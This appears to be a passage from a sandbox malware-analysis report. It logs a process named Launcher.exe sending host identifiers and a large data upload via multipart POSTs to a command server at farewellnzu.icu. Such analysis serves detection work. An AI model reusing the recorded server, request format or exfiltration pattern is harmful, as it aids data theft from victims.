                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 79 47 4d 64 6a 76 59 2b 39 44 42 33 64 61 42 42 69 72 57 47 43 55 38 4c 37 55 71 41 38 42 31 42 38 4f 78 2b 74 32 59 37 51 69 6d 5a 58 67 43 43 31 6c 76 52 59 55 4f 35 6d 42 58 4f 6f 4a 37 6c 50 77 65 74 66 72 44 56 4e 54 44 4d 6f 56 71 33 64 79 59 76 59 49 42 62 4a 4a 4b 4c 58 70 52 52 30 37 48 30 4f 59 75 34 38 2f 56 79 42 36 6c 58 74 61 41 64 4c 4f 43 31 62 72 64 6e 49 6a 63 78 74 57 59 59 69 75 70 6a 35 58 31 54 74 62 67 31 33 6f 79 65 68 54 38 72 69 56 61 51 38 53 67 39 38 59 6c 69 79 6c 5a 62 49 2b 32 31 57 68 79 53 73 31 2b 49 61 52 4b 74 6f 44 44 4c 32 59 37 4a 4a 7a 75 35 57 72 6a 4e 47 52 53 41 77 55 36 50 64 79 34 54 42 62 6c 36 62 4a 62 57 65 2f 6c 64 55 37 47 63 4d 65 4b 30 6b 38 77 75 42 36 6b 48 74 61 41 64 73 4a 54 4a 53 36 73 71 41 6b 59
                                                                      Data Ascii: yGMdjvY+9DB3daBBirWGCU8L7UqA8B1B8Ox+t2Y7QimZXgCC1lvRYUO5mBXOoJ7lPwetfrDVNTDMoVq3dyYvYIBbJJKLXpRR07H0OYu48/VyB6lXtaAdLOC1brdnIjcxtWYYiupj5X1Ttbg13oyehT8riVaQ8Sg98YliylZbI+21WhySs1+IaRKtoDDL2Y7JJzu5WrjNGRSAwU6Pdy4TBbl6bJbWe/ldU7GcMeK0k8wuB6kHtaAdsJTJS6sqAkY
                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 4a 4c 79 5a 37 31 46 62 35 47 41 4a 65 36 6f 72 73 45 58 46 36 56 36 6f 4d 30 74 45 4e 53 46 51 72 74 7a 41 67 63 55 67 46 73 6b 6b 6f 74 65 6c 46 48 7a 77 62 41 78 2f 37 6a 7a 39 58 49 48 71 56 65 31 6f 42 30 4d 38 4a 31 2b 67 30 38 71 4e 7a 47 70 64 69 53 69 35 6d 50 6c 53 57 65 52 76 43 33 75 76 4a 62 5a 50 79 75 74 55 72 6a 5a 42 44 33 78 69 57 4c 4b 56 6c 73 6a 71 65 31 57 46 4a 50 71 49 73 30 30 64 37 47 4e 41 4b 75 34 6f 76 30 48 47 37 56 53 75 4f 45 4a 4c 4f 43 64 66 6f 73 66 47 69 4d 31 79 53 6f 6b 71 76 35 76 2b 56 46 6e 74 5a 67 5a 78 71 6d 50 39 42 63 62 31 47 66 56 77 61 6b 4d 31 43 31 69 78 6c 64 48 47 30 79 42 66 68 57 50 69 31 2f 78 66 56 2b 52 69 41 33 53 74 4b 4c 5a 50 77 4f 70 52 6f 43 4a 45 51 44 30 6d 58 36 58 54 79 49 6e 46 5a 6c 2b
                                                                      Data Ascii: JLyZ71Fb5GAJe6orsEXF6V6oM0tENSFQrtzAgcUgFskkotelFHzwbAx/7jz9XIHqVe1oB0M8J1+g08qNzGpdiSi5mPlSWeRvC3uvJbZPyutUrjZBD3xiWLKVlsjqe1WFJPqIs00d7GNAKu4ov0HG7VSuOEJLOCdfosfGiM1ySokqv5v+VFntZgZxqmP9Bcb1GfVwakM1C1ixldHG0yBfhWPi1/xfV+RiA3StKLZPwOpRoCJEQD0mX6XTyInFZl+
                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 66 34 54 59 39 56 49 46 6e 69 70 4d 37 52 53 7a 71 30 58 37 54 38 48 46 77 74 69 56 71 33 4f 33 35 37 48 63 46 2f 4a 48 50 54 58 35 52 51 46 71 31 6f 44 66 4b 41 6b 70 56 53 4d 79 6b 2b 6e 4e 31 64 49 4a 53 30 66 35 4a 58 49 79 4a 49 7a 46 73 6b 6e 71 39 65 6c 42 41 2b 77 4f 6c 4d 6c 2f 6e 47 73 43 39 69 74 54 2b 31 6f 46 51 46 79 4d 42 2f 79 6c 59 6d 4c 32 48 4a 65 69 6a 57 35 30 4d 4e 71 65 76 46 69 42 6d 57 2f 48 59 31 43 32 2b 42 66 75 69 45 4c 57 6a 45 73 55 61 33 44 6a 73 61 4b 62 78 6a 52 47 76 72 66 76 57 73 54 71 33 64 41 4b 75 34 57 73 45 76 50 36 6b 2b 38 66 57 42 56 50 79 52 49 75 35 57 41 79 4d 77 67 41 4e 6c 74 2b 70 50 73 46 41 57 37 50 56 73 6e 2f 58 54 6a 46 39 36 6a 51 4f 30 6d 42 78 64 67 62 42 2b 34 6c 5a 62 49 6a 57 4e 4b 6d 79 57 35
                                                                      Data Ascii: f4TY9VIFnipM7RSzq0X7T8HFwtiVq3O357HcF/JHPTX5RQFq1oDfKAkpVSMyk+nN1dIJS0f5JXIyJIzFsknq9elBA+wOlMl/nGsC9itT+1oFQFyMB/ylYmL2HJeijW50MNqevFiBmW/HY1C2+BfuiELWjEsUa3DjsaKbxjRGvrfvWsTq3dAKu4WsEvP6k+8fWBVPyRIu5WAyMwgANlt+pPsFAW7PVsn/XTjF96jQO0mBxdgbB+4lZbIjWNKmyW5
                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 33 7a 4c 31 67 79 6d 79 43 39 53 38 62 37 53 4f 41 58 53 55 67 7a 4e 45 2b 39 32 6f 37 47 69 6d 59 59 30 58 48 30 31 2f 6c 46 48 62 4d 2f 55 69 6e 37 63 4f 51 56 6b 2f 49 58 74 48 42 52 44 32 70 77 45 65 72 48 6a 74 43 4b 4a 31 75 62 4d 62 79 55 36 31 63 61 31 56 45 6e 66 4b 6b 69 70 56 58 57 34 68 61 44 42 6d 5a 78 44 44 64 63 70 4e 76 4a 6e 74 73 67 46 73 6b 73 2b 73 2f 45 46 42 57 72 55 45 34 79 74 6d 50 72 42 66 54 75 56 36 4d 33 55 56 35 2f 42 56 47 74 31 4e 69 59 33 57 38 58 70 78 57 62 31 37 4d 55 57 36 73 33 55 6a 7a 75 4a 36 49 46 6d 62 30 4c 39 6d 55 55 47 47 4a 77 51 4f 54 4d 6a 70 36 4b 4f 41 72 48 59 36 6a 58 70 52 51 61 36 48 30 53 64 4b 30 31 73 41 4c 2f 30 33 36 6a 4e 30 5a 5a 49 69 39 54 69 39 62 66 67 76 52 65 54 59 6f 74 74 4a 44 72 52
                                                                      Data Ascii: 3zL1gymyC9S8b7SOAXSUgzNE+92o7GimYY0XH01/lFHbM/Uin7cOQVk/IXtHBRD2pwEerHjtCKJ1ubMbyU61ca1VEnfKkipVXW4haDBmZxDDdcpNvJntsgFsks+s/EFBWrUE4ytmPrBfTuV6M3UV5/BVGt1NiY3W8XpxWb17MUW6s3UjzuJ6IFmb0L9mUUGGJwQOTMjp6KOArHY6jXpRQa6H0SdK01sAL/036jN0ZZIi9Ti9bfgvReTYottJDrR
                                                                      2024-11-23 14:12:58 UTC1369INData Raw: 43 51 36 4d 6e 70 56 44 43 2f 56 36 54 44 6d 70 64 4e 54 4a 63 36 50 6e 4a 68 63 5a 65 5a 72 34 79 76 59 65 2f 63 6c 37 39 62 45 41 38 37 6a 76 7a 48 59 48 41 53 36 6f 67 52 41 30 65 4a 56 4b 6d 6c 64 48 47 30 79 42 4f 79 58 76 70 32 62 31 47 48 62 4d 76 52 33 47 38 4d 62 56 47 31 2b 34 65 6b 77 35 71 58 54 55 79 58 4f 6a 6b 77 34 7a 63 64 56 75 5a 4a 49 53 70 30 45 5a 61 2b 32 78 43 56 35 52 68 67 6c 50 43 37 56 65 71 63 41 6b 50 4b 6d 49 48 36 76 6a 63 6a 39 70 6a 47 71 77 5a 2b 4b 62 72 56 31 33 6c 61 45 42 74 34 44 72 7a 55 34 47 31 43 75 4e 77 56 51 39 71 59 68 69 6b 32 4d 2b 4c 78 47 4e 4b 6d 79 57 35 67 66 34 54 59 39 56 41 43 33 4f 2b 4c 71 4a 49 78 66 74 6e 6b 78 64 42 53 6a 55 63 59 5a 33 45 79 5a 69 49 52 6c 75 66 49 50 72 5a 76 55 77 64 73 79
                                                                      Data Ascii: CQ6MnpVDC/V6TDmpdNTJc6PnJhcZeZr4yvYe/cl79bEA87jvzHYHAS6ogRA0eJVKmldHG0yBOyXvp2b1GHbMvR3G8MbVG1+4ekw5qXTUyXOjkw4zcdVuZJISp0EZa+2xCV5RhglPC7VeqcAkPKmIH6vjcj9pjGqwZ+KbrV13laEBt4DrzU4G1CuNwVQ9qYhik2M+LxGNKmyW5gf4TY9VAC3O+LqJIxftnkxdBSjUcYZ3EyZiIRlufIPrZvUwdsy


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.649701172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:13:00 UTC282OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=KH182FAKYTKNBSET0JQ
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12872
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:13:00 UTC12872OUTData Raw: 2d 2d 4b 48 31 38 32 46 41 4b 59 54 4b 4e 42 53 45 54 30 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 39 46 32 42 46 34 33 43 44 37 36 43 31 39 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 4b 48 31 38 32 46 41 4b 59 54 4b 4e 42 53 45 54 30 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 48 31 38 32 46 41 4b 59 54 4b 4e 42 53 45 54 30 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 6e
                                                                      Data Ascii: --KH182FAKYTKNBSET0JQContent-Disposition: form-data; name="hwid"AE9F2BF43CD76C19C8852029FBE145BA--KH182FAKYTKNBSET0JQContent-Disposition: form-data; name="pid"2--KH182FAKYTKNBSET0JQContent-Disposition: form-data; name="lid"LPnhqo--zn
                                                                      2024-11-23 14:13:01 UTC1018INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:13:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=tgn9u07egqr4euek8tao1gfkk3; expires=Wed, 19-Mar-2025 07:59:39 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBOOewg06FfXMGBgBlh6QDRbl2s2pi2LXfgIJFueEC53Rm5%2FG49lpcGev7Q0OkdK%2BlehHQdu%2B5xr1V3%2BnBcCWSThRdU18Eb%2FiSy7T0kvzxkzkxrDyAV2ApI%2F6kcuicTCOjE%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c1e6ea011906-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1485&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13812&delivery_rate=1909744&cwnd=252&unsent_bytes=0&cid=08f08588d487c303&ts=790&x=0"
                                                                      2024-11-23 14:13:01 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:13:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649702172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:13:02 UTC274OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=ODT8QICBOD0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15070
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:13:02 UTC15070OUTData Raw: 2d 2d 4f 44 54 38 51 49 43 42 4f 44 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 39 46 32 42 46 34 33 43 44 37 36 43 31 39 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 4f 44 54 38 51 49 43 42 4f 44 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 44 54 38 51 49 43 42 4f 44 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 6e 6e 75 61 6f 73 76 67 68 75 6e 0d 0a 2d 2d 4f 44 54 38 51 49 43 42 4f 44
                                                                      Data Ascii: --ODT8QICBOD0Content-Disposition: form-data; name="hwid"AE9F2BF43CD76C19C8852029FBE145BA--ODT8QICBOD0Content-Disposition: form-data; name="pid"2--ODT8QICBOD0Content-Disposition: form-data; name="lid"LPnhqo--znnuaosvghun--ODT8QICBOD
                                                                      2024-11-23 14:13:03 UTC1016INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:13:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=9fommcmef4op89immcmh14mm0b; expires=Wed, 19-Mar-2025 07:59:42 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymABdLAvmMoIV2GE8zACV5wawj0GBbptaScLQ%2Fq5RGYAOxTh8wUfGjmuxT%2BVRsRzhKCcMZc%2BQP%2FlfwNyylQVP88WXhT6culesJBgagFdd%2BAe7UZIoNSCJtx9ojxdVSi0HwY%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c1f4aaf77d02-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1804&sent=7&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16002&delivery_rate=1593016&cwnd=228&unsent_bytes=0&cid=2f3eeab2479c9782&ts=788&x=0"
                                                                      2024-11-23 14:13:03 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:13:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.649703172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:13:04 UTC274OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=I7NI61LWEAD
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 19928
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:13:04 UTC15331OUTData Raw: 2d 2d 49 37 4e 49 36 31 4c 57 45 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 39 46 32 42 46 34 33 43 44 37 36 43 31 39 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 49 37 4e 49 36 31 4c 57 45 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 37 4e 49 36 31 4c 57 45 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 6e 6e 75 61 6f 73 76 67 68 75 6e 0d 0a 2d 2d 49 37 4e 49 36 31 4c 57 45 41
                                                                      Data Ascii: --I7NI61LWEADContent-Disposition: form-data; name="hwid"AE9F2BF43CD76C19C8852029FBE145BA--I7NI61LWEADContent-Disposition: form-data; name="pid"3--I7NI61LWEADContent-Disposition: form-data; name="lid"LPnhqo--znnuaosvghun--I7NI61LWEA
                                                                      2024-11-23 14:13:04 UTC4597OUTData Raw: c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                      2024-11-23 14:13:05 UTC1017INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:13:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=ppni174au0ufsbj0mitr3ghshv; expires=Wed, 19-Mar-2025 07:59:44 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yVzmNUD44CYLcUGdtMx%2FGWtXr%2F3ra7adL6UdCKkYRvcXBxMJ4bOBPrIjFFxumE%2BQ0uu8PBvrCueML0ukoj5lTFRg672RY8Uwly1Os7AyoC%2BgpFCWDcYGL1mbgZ3%2B7x4vLwY%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c2029e6f8cad-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1968&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=20882&delivery_rate=1430671&cwnd=246&unsent_bytes=0&cid=2194ce320764cbeb&ts=931&x=0"
                                                                      2024-11-23 14:13:05 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:13:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.649705172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:13:07 UTC273OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=WP6G358XV8B
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1183
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:13:07 UTC1183OUTData Raw: 2d 2d 57 50 36 47 33 35 38 58 56 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 39 46 32 42 46 34 33 43 44 37 36 43 31 39 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 57 50 36 47 33 35 38 58 56 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 50 36 47 33 35 38 58 56 38 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 6e 6e 75 61 6f 73 76 67 68 75 6e 0d 0a 2d 2d 57 50 36 47 33 35 38 58 56 38
                                                                      Data Ascii: --WP6G358XV8BContent-Disposition: form-data; name="hwid"AE9F2BF43CD76C19C8852029FBE145BA--WP6G358XV8BContent-Disposition: form-data; name="pid"1--WP6G358XV8BContent-Disposition: form-data; name="lid"LPnhqo--znnuaosvghun--WP6G358XV8
                                                                      2024-11-23 14:13:07 UTC1006INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 14:13:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=fpng82ojob308m05epdahddng7; expires=Wed, 19-Mar-2025 07:59:46 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OWQDE0qNz3QMxqLGXkALAafbYazdJr8ItUcRNLqHuI2BHQjnG86E4gnXS95pezF8cQfK08otK6T0zPOT9R3e%2FAvjmrIpyjAkRmnE60nR3jkXJRPa6AtdCiShqnsB43QYhk%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71c211a8104291-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2580&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2092&delivery_rate=1113229&cwnd=207&unsent_bytes=0&cid=503b6472a2783ae9&ts=710&x=0"
                                                                      2024-11-23 14:13:07 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                      Data Ascii: eok 8.46.123.75
                                                                      2024-11-23 14:13:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.649711172.67.198.614435688C:\Users\user\Desktop\Launcher.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 14:13:09 UTC276OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=K093XR63GLCD
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 571912
                                                                      Host: farewellnzu.icu
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: 2d 2d 4b 30 39 33 58 52 36 33 47 4c 43 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 39 46 32 42 46 34 33 43 44 37 36 43 31 39 43 38 38 35 32 30 32 39 46 42 45 31 34 35 42 41 0d 0a 2d 2d 4b 30 39 33 58 52 36 33 47 4c 43 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 30 39 33 58 52 36 33 47 4c 43 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 6e 6e 75 61 6f 73 76 67 68 75 6e 0d 0a 2d 2d 4b 30 39 33 58 52 36
                                                                      Data Ascii: --K093XR63GLCDContent-Disposition: form-data; name="hwid"AE9F2BF43CD76C19C8852029FBE145BA--K093XR63GLCDContent-Disposition: form-data; name="pid"1--K093XR63GLCDContent-Disposition: form-data; name="lid"LPnhqo--znnuaosvghun--K093XR6
                                                                      2024-11-23 14:13:09 UTC15331OUTData Raw: ce d7 2b 36 08 d2 1c a2 3b 5a 91 6a 2b dc 17 ab c1 e5 98 6b a8 77 2e 3f ba e3 3b fd a7 a4 cb 6b 05 8d 48 1f d8 d3 03 51 bf 6d 9c 8e 55 1e cc 4e 48 50 d9 5b cf 5a d4 0b 3b 1d f9 70 f6 50 9b 26 84 9e f7 79 a7 02 95 37 79 c5 42 2e 28 d1 45 6a 09 82 ca 66 73 95 0a 00 5f 71 b3 c9 7a f1 d1 e1 49 75 1e 66 96 b9 f4 4b 15 7f 28 bd 6c 6f 78 d6 73 d1 54 22 53 10 41 dd 70 11 fe f5 32 cc 11 2c 57 df 3c 37 fc b3 83 95 f1 8a 3e bb ca 0b 76 93 00 d5 33 12 2c f3 2d 66 61 2d 70 5b d6 f3 a9 ab e9 f1 37 65 64 ee f5 a6 b5 b3 d6 10 82 55 d7 eb 07 5f ae d8 23 a8 ca 16 ff df c3 98 bd 58 18 19 8c 21 6b b3 a7 01 c4 bd 6a 36 1f 76 05 96 88 36 b9 79 15 33 3c 1d c7 aa 30 57 97 a5 da cf 0c e5 dd c2 e7 33 b4 f3 a6 ba 2d 40 3e 0e d3 8b 84 7b 7f 3b f5 cd 42 d4 d7 63 01 aa 99 b2 d1 fb 32
                                                                      Data Ascii: +6;Zj+kw.?;kHQmUNHP[Z;pP&y7yB.(Ejfs_qzIufK(loxsT"SAp2,W<7>v3,-fa-p[7edU_#X!kj6v6y3<0W3-@>{;Bc2
